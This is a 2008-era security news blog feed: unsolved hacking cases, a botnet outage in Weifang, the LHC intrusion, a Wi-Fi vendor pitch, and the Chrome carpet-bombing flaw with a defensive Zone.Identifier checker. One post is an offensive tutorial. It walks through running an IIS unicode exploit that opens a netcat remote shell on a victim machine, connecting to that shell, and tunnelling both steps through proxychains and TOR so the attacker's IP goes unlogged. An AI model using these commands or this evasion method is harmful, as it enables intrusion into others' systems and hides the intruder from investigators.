Sep 30

The best criminal hacker is the one that isn’t caught—or even
identified. These are 10 of the most infamous unsolved computer crimes
(that we know about).

The most nefarious and crafty criminals are the ones who operate
completely under the radar. In the computing world security breaches
happen all the time, and in the best cases the offenders get tracked
down by the FBI or some other law enforcement agency.
But it’s the ones who go uncaught and unidentified (those we didn’t
highlight in our Cyber Crime Hall of Fame) that are actually the best.
Attempting to cover your tracks is Law-Breaking 101; being able to
effectively do so, that’s another story altogether.
When a major cyber crime remains unsolved, though, it probably also
means that those of us outside the world of tech crime solving may
never even know the crime occurred.
These are some of the top headline-worthy highlights in the world of
unsolved computing crime—cases in which the only information available
is the ruin left in their wake.
The WANK Worm (October 1989)
Possibly the first “hacktivist” (hacking activist) attack, the WANK
worm hit NASA offices in Greenbelt, Maryland. WANK (Worms Against
Nuclear Killers) ran a banner (pictured) across system computers as
part of a protest to stop the launch of the plutonium-fueled,
Jupiter-bound Galileo probe. Cleaning up after the crack has been said
to have cost NASA up to a half of a million dollars in time and
resources. To this day, no one is quite sure where the attack
originated, though many fingers have pointed to Melbourne,
Australia-based hackers.
Ministry of Defense Satellite Hacked (February 1999)
A small group of hackers traced to southern England gained control of a
MoD Skynet military satellite and signaled a security intrusion
characterized by officials as “information warfare,” in which an enemy
attacks by disrupting military communications. In the end, the hackers
managed to reprogram the control system before being discovered. Though
Scotland Yard’s Computer Crimes Unit and the U.S. Air Force worked
together to investigate the case, no arrests have been made.
CD Universe Credit Card Breach (January 2000)
A blackmail scheme gone wrong, the posting of over 300,000 credit card
numbers by hacker Maxim on a Web site entitled “The Maxus Credit Card
Pipeline” has remained unsolved since early 2000. Maxim stole the
credit card information by breaching CDUniverse.com; he or she then
demanded $100,000 from the Web site in exchange for destroying the
data. While Maxim is believed to be from Eastern Europe, the case
remains as yet unsolved.
Military Source Code Stolen (December 2000)
If there’s one thing you don’t want in the wrong hands, it’s the source
code that can control missile-guidance systems. In winter of 2000, a
hacker broke into government-contracted Exigent Software Technology and
nabbed two-thirds of the code for Exigent’s OS/COMET software, which is
responsible for both missile and satellite guidance, from the Naval
Research Lab in Washington, D.C. Officials were able to follow the
trail of the intruder “Leaf” to the University of Kaiserslautern in
Germany, but that’s where the trail appears to end.
Anti-DRM Hack (October 2001)
In our eyes, not all hackers are bad guys (as evidenced by our list of
the Ten Greatest Hacks of All Time); often they’re just trying to right
a wrong or make life generally easier for the tech-consuming public.
Such is the case of the hacker known as Beale Screamer, whose FreeMe
program allowed Windows Media users to strip digital-rights-management
security from music and video files. While Microsoft tried to hunt down
Beale, other anti-DRM activists heralded him as a crusader.

Dennis Kucinich on CBSNews.com (October 2003)
As Representative Kucinich’s presidential campaign struggled in the
fall of 2003, a hacker did what he could to give it a boost. Early one
Friday morning the CBSNews.com homepage was replaced by the campaign’s
logo. The page then automatically redirected to a 30-minute video
called “This is the Moment,” in which the candidate laid out his
political philosophy. The Kucinich campaign denied any involvement with
the hack, and whoever was responsible was not identified.
Hacking Your MBA App (March 2006)
Waiting on a college or graduate school decision is a nail-biting
experience, so when one hacker found out how to break into the
automated ApplyYourself application system in 2006, it was only natural
that he wanted to share the wealth. Dozens of top business schools,
including Harvard and Stanford, saw applicants exploiting the hack in
order to track their application statuses. The still-unknown hacker
posted the ApplyYourself login process on Business Week’s online
forums; the information was promptly removed and those who used it were
warned by schools that they should expect rejection letters in the
mail.
The 26,000 Site Hack Attack (Winter 2008)
MSNBC.com was among the largest of the thousands of sites used by a
group of unknown hackers earlier this year to redirect traffic to their
own JavaScript code hosted by servers known for malware. The malicious
code was embedded in areas of the sites where users could not see it,
but where hackers could activate it.
Supermarket Security Breach (February 2008)
Overshadowed only by a T.J. Maxx breach in 2005, the theft of at least
1,800 credit and debit card numbers (and the exposure of about 4.2
million others) at supermarket chains Hannaford and Sweetbay (both
owned by the Belgium-based Delhaize Group) in the Northeast United
States and Florida remains unsolved more than six months later. Chain
reps and security experts are still unclear as to how the criminals
gained access to the system; the 2005 T.J.Maxx breach took advantage of
a vulnerability in the chain’s wireless credit transfer system, but
Hannaford and Sweetbay do not use wireless transfers of any sort.
Without more information, the difficulty in tracking down those
responsible grows exponentially.
Comcast.net Gets a Redirect (May 2008)
A devious hack doesn’t always mean finding a back door or particularly
crafty way into a secure network or server; sometimes it just means
that account information was compromised. Such was the case earlier
this year when a member of the hacker group Kryogeniks gained
unauthorized access to Comcast.net’s registrar, Network Solutions. The
domain name system (DNS) hack altered Comcast.net’s homepage to
redirect those attempting to access webmail to the hackers’ own page
(pictured). Spokespeople for Comcast and Network Solutions are still
unclear as to how the hackers got the username and password.

http://www.newcriminologist.com/article.asp?nid=2097

Sep 29

Expert shows how he can get into a Web app without touching the application itself

Chris Nickerson can gain access to a Web application without ever touching it — with just the right amount of reconnaissance, the so-called Tiger Team hacker can infiltrate the development team and compromise their machines.

“I can get into the application from the back side while on the outside, without touching” the app, says Nickerson, who gave attendees of the Open Web Application Security Project (OWASP) USA conference in New York today a taste of what he considers the big-picture cyber threats to organizations, targeted attacks for money or corporate espionage. “Closing all the holes in a Web application doesn’t make you secure,”


Sep 25

Xirrus asserts the importance of line-rate Wi-Fi encryption at the network edge to support non-compromised Wi-Fi performance. The rollout of 802.11n – which brings a 6X or more boost to Wi-Fi network performance – is mandating a reassessment of how and where wireless encryption is implemented in the network.

While typical thin AP + controller-based systems centralize this function, Xirrus’ Wi-Fi Array architecture distributes encryption and intelligence to the network edge to enable secure, line-rate encryption today plus the capability to upgrade to new technologies tomorrow.

The standardization of 802.11i in 2004, and its subsequent certification as WPA/WPA2 by the Wi-Fi Alliance, has ensured robust, highly secure deployment options for Wi-Fi networks. Best practices advocate that these security technologies be deployed as a given in enterprise-grade wireless networks, and that users abandon the original WEP security standard. The implementation of the encryption portion of WPA/WPA2 places significant processing requirements on Wi-Fi equipment designs.

Network traffic flow and the distribution of processing power are key variables between distributed and centralized Wi-Fi architectures, and ultimately impact the performance limits of these systems. Several of the key differences are as follows:

1. Distributed Wi-Fi systems, characterized by processing resources within the Array/AP:

  • Scale seamlessly with network growth
  • Encryption performance is added as Arrays/APs are added
  • Reduce core network traffic
  • Wi-Fi traffic is encrypted/decrypted at the edge, and does not need to traverse the network to/from the controller
  • Simplify and reduce the cost of redundant design
  • Fewer users are impacted by outages, and proper coverage design can ensure continuous up time.

2. Centralized controller-based Wi-Fi systems, characterized by many thin Access Points connected to a central controller:

  • Create an encryption processing choke point
  • Centralized vendors state a 5X and greater hit in performance for encrypted vs. non-encrypted traffic
  • Create a network traffic choke point
  • All traffic is directed to the core, whether its ultimate destination is there or not
  • Create a significant single point of failure
  • Expensive encryption engines must be replicated for redundancy.

The Xirrus Wi-Fi Array supports a modular hardware and software-reprogrammable architecture, which allows new encryption or other technologies to be implemented without wholesale product changes. Wi-Fi technology is continually evolving, with higher performance versions of 802.11n, advanced encryption technologies (e.g. 256 bit AES), and numerous other new 802.11 standards on the horizon. Upgradeability is a critical consideration for customers looking to implement a Wi-Fi network today and protect their investment in the future.

Sep 25

Following India’s threat to shut down the Blackberry network in the country unless Research in Motion allows the government to snoop on Blackberry users made earlier this year, the country seems to have found a more pragmatic solution, and in a surprising move has publicly announced that they have finally managed to crack Blackberry’s encryption

Sep 24


The Weifang Public Security Bureau has successfully closed a case involving a hacker attack that caused a city-wide network paralysis.

In July of 2008, the Weifang Public Security Bureau Cyber Police received a report from the China Network Communications Corporation stating that the Weifang metropolitan network was under continuous hacker attack and this had caused a two day network outage for the entire city. Since over 90% of the users in Weifang subscribe to China Network Communications, the network outage affected over 400,000 users, including businesses, local government, schools, and hospitals.

Police pursued three suspects over a 3,000 kilometer chase passing through Tianjin, Beijing, Qingdao, Jinan and Shouguang. When the suspects were arrested, the police recovered laptops and eight other pieces of equipment. Two of the suspects charged with the crime worked as supervisors for a competing company and they confessed to hiring a third individual to hack the Weifang Corporation. The hacker used a botnet of over 8,000 computers to attack the company.

Sep 13

A team of hackers going by the name of the Greek Security Team has managed to hack into the system which is controlling the potentially world changing Large Hadron Collider experiment. In a move which was described as harmless but proving a point, it was revealed that they managed to hack into one of the four detectors which are set to monitor how the system performs and exactly what is happening.
On a rather more bullish note it was revealed that scientists have managed to cram an expected 4 days of research into just 24 hours and the team seems to be well ahead of schedule. But that does not mean that the end of the world is close by as October is the month in which scientists expect the first ‘hit’ – where two protons are expected to smash into each other at the speed of light.

Sep 7

This tutorial is about how to tunnel all your “console” data, e.g. telnet, netcat or exploits etc., through proxies so that your IP would not be logged there ;)

A few free utilities are floating around on the internet for this purpose. We’ll use “proxychains”, available on sourceforge.net (http://proxychains.sourceforge.net/).
It’s available for *nix platforms only.

Installation of proxychains on *nix platform (BackTrack3 in my case)

Downloaded file: proxychains-3.1.tar.gz
Untar the package:

# tar -xvzf proxychains-3.1.tar.gz

It will create a directory named “proxychains-3.1”.

Change the directory
# cd proxychains-3.1

Configure and install it
# ./configure
# make
# make install

(It’s always advisable to read “README” and “INSTALL” text files residing in the same directory before configuring and installing Linux applications)

Hope no error occurs while installing (otherwise Google is your friend)

Now /etc/proxychains.conf is the file where you can put your proxies to be used in different manners. But that’s always a frustrating job as proxies die soon and hence your frequent intervention will be required. So it’s better to rely on the TOR proxy network for this. Proxychains has an option for using the TOR network for tunneling the data.

For that you don’t need to edit configuration file (proxychains.conf) in any way.

Example:
Suppose you have to run an exploit at your end which will in turn run netcat installed on remote machine (by you or some other intruder). After that of course you will telnet to the remote machine to get remote console.

(Exploit by Roelof Temming, unitoolz)
# ./unicodeexecute3.pl <remote_ip>:80 'c:\nc.exe -l -p 80 -d -e cmd.exe'
# telnet <remote_ip> 80

So in a normal situation you will establish a connection twice with the remote machine (IP logged!!!)
Here proxychains will help us to hide our identity.

# proxychains ./unicodeexecute3.pl <remote_ip>:80 'c:\nc.exe -l -p 80 -d -e cmd.exe'
# proxychains telnet <remote_ip> 80

...and you are safe now

But how would you assure that your IP has been changed? Or better to say, it’s been spoofed?
Here comes the usage of one more Linux utility: “lynx”. It’s a kind of console browser.

# lynx www.google.com

and it’ll open up google on your console (obviously without graphics)

Edit the /etc/proxychains.conf file and comment out the following line (prefix it with “#”):
# Proxy DNS requests - no leak for DNS data
proxy_dns

Now open console and type
# proxychains lynx www.whatismyip.com
or
# proxychains lynx www.findmyip.com

Voila!!! Your IP has been spoofed.

Obviously you need to configure TOR and Privoxy on your Linux machine before proxychains can use them (that’s not a piece of cake).

TOR and privoxy are already installed on your BT3 machine but you need to configure privoxy properly in order to use them successfully.

Happy Hacking !!!

Tutorial by

My Friend (Frozen sm0ke)

Sep 4

The new browser from Google tries to get the best from other browsers, but instead (well, at least in the current beta version), it seems to be doing quite the opposite.

The current beta uses an old version of WebKit – 525.13 – which is actually the same WebKit engine used by the old Safari v3.1. The current Safari version is v3.1.2, which fixed several critical issues, including the “blended threat” Carpet Bombing vuln. Google even mentions that they use the Safari v3.1 rendering engine in their own documentation (Thanks Yonatan Grabber for the information!).

On the other hand, Chrome borrowed (and modified) local resource files from the Mozilla project. And also, for some reason, in some cases there is an ActiveX plug-in loaded by Chrome, which might be evidence of a capability of this browser to execute ActiveX controls. You can have a look at your own system where Chrome has been installed; the path would be:
“c:\users\(yourusername)\AppData\Local\google\Chrome\Application\0.2.149.27\chrome.dll”

I really wonder why Google have taken several features from other browsers and mixed them all together. Security wise, it’s very problematic.
They’ll have to track all security vulnerabilities in those features, and fix them in Chrome too. This will probably be only after those vulnerabilities were fixed by the other vendors or were publicly reported. It will put Chrome users at risk for a long time.

Back to the WebKit issue. I’ve created a proof-of-concept which demonstrates the automatic download vulnerability that was already fixed by Apple. This PoC will automatically download a JAR file and place it in the downloads folder (there are reports that in some cases it will download it to the Desktop, as in Safari. In those cases, the Safari-Pwns-IE exploit can be easily converted to a Chrome-Pwns-IE exploit).
Unfortunately, whenever Google Chrome downloads a file, it creates a download bar at the bottom of the page, which seems, to the untrained eye, like part of the page. The downloaded filename is displayed as a button, and one click on this button will execute the file. If the file is an executable (e.g. .EXE, .BAT, etc.), Windows Explorer will show a warning that this file was downloaded from the Internet. In this case, Google Chrome does a good job by setting the Zone.Identifier in the alternate data stream.

However, as was mentioned by pdp at his great Black Hat talk this August, when Windows Explorer tries to execute a JAR file, it will automatically run the associated application, which in most cases is the JRE (Java Runtime Environment). The JRE will not check the Zone.Identifier in the alternate data stream, and will execute the JAR file with no warning. A JAR file, of course, should be treated like any other executable file. This is again a sort of “blended threat”. Two small issues in different products, when blended together, create a much larger problem.
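Added example (not from Aviv Raff’s post, nor Google’s or Microsoft’s code): a small Python checker that parses a download’s Zone.Identifier stream and flags file types whose handler ignores the mark, the JAR-and-JRE case described above. Reading the alternate data stream is kept separate from the parsing so the logic can be exercised on a constructed stream on any OS; the extension sets are assumptions, not Windows’ full handler lists.

```python
# Added example: triage downloaded files by their Mark-of-the-Web
# (Zone.Identifier stream). Explorer honours the mark for .exe-style
# files; the JRE ignores it when opening a .jar, so that case is flagged.
import os

URLZONE_INTERNET = 3  # ZoneId >= 3 means Internet / Untrusted origin

# Assumption: representative subsets, not Windows' full handler lists.
EXPLORER_CHECKED = {".exe", ".bat", ".cmd", ".msi", ".scr"}
HANDLER_IGNORES_ZONE = {".jar"}  # opened by the JRE, which skips the check


def parse_zone_identifier(stream_text):
    """Parse the INI-style stream ([ZoneTransfer] / ZoneId=3 ...) into a dict.

    Only keys under [ZoneTransfer] are kept; an empty or foreign stream
    yields {}.
    """
    section, fields = None, {}
    for raw in stream_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def assess(filename, stream_text):
    """Return (zone_id, verdict) for a filename and its Zone.Identifier text."""
    try:
        zone = int(parse_zone_identifier(stream_text).get("ZoneId", ""))
    except ValueError:
        return None, "no-motw"  # no valid mark: nothing downstream will warn
    if zone < URLZONE_INTERNET:
        return zone, "trusted-zone"
    ext = os.path.splitext(filename)[1].lower()
    if ext in HANDLER_IGNORES_ZONE:
        return zone, "motw-ignored-by-handler"  # the blended-threat case
    if ext in EXPLORER_CHECKED:
        return zone, "explorer-warns"
    return zone, "motw-present"


def read_zone_stream(path):
    """Read the file's Zone.Identifier ADS (NTFS only); empty string if absent."""
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8") as stream:
            return stream.read()
    except OSError:
        return ""


# Constructed sample stream, in the form written for an Internet download.
SAMPLE_STREAM = "[ZoneTransfer]\r\nZoneId=3\r\n"
```

On a Windows machine, `assess(os.path.basename(p), read_zone_stream(p))` gives the verdict for a real download `p`; a `motw-ignored-by-handler` result is the file to treat as if no warning will ever be shown.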

Sep 3

Google Chrome isn’t officially out yet, but security researchers have already picked the browser apart to discover a security vulnerability.

The WebKit engine used inside Chrome leaves it vulnerable to the infamous Safari carpetbombing flaw, security researcher Aviv Raff warns. The flaw stems from a combination of a vulnerability in Apple Safari WebKit and a Java security bug, notes security blogger Ryan Naraine.

As a result Windows users of the beta software might be tricked into downloading malicious files onto their desktop. Raff has published a harmless proof-of-concept exploit in order to illustrate his concerns.

Apple patched the vulnerability with Safari v3.1.2, but the underlying software behind Chrome is based on older code, hence the vulnerability.
Security watchers warn further vulnerabilities are bound to arise. Against this many are praising the speed and built-in security features of the browser. Chrome features built-in sandboxing for each tab, anti-phishing technology and a privacy (ie smut-surfing) mode.

Note: if you want to see the exploit really working, then use Chrome.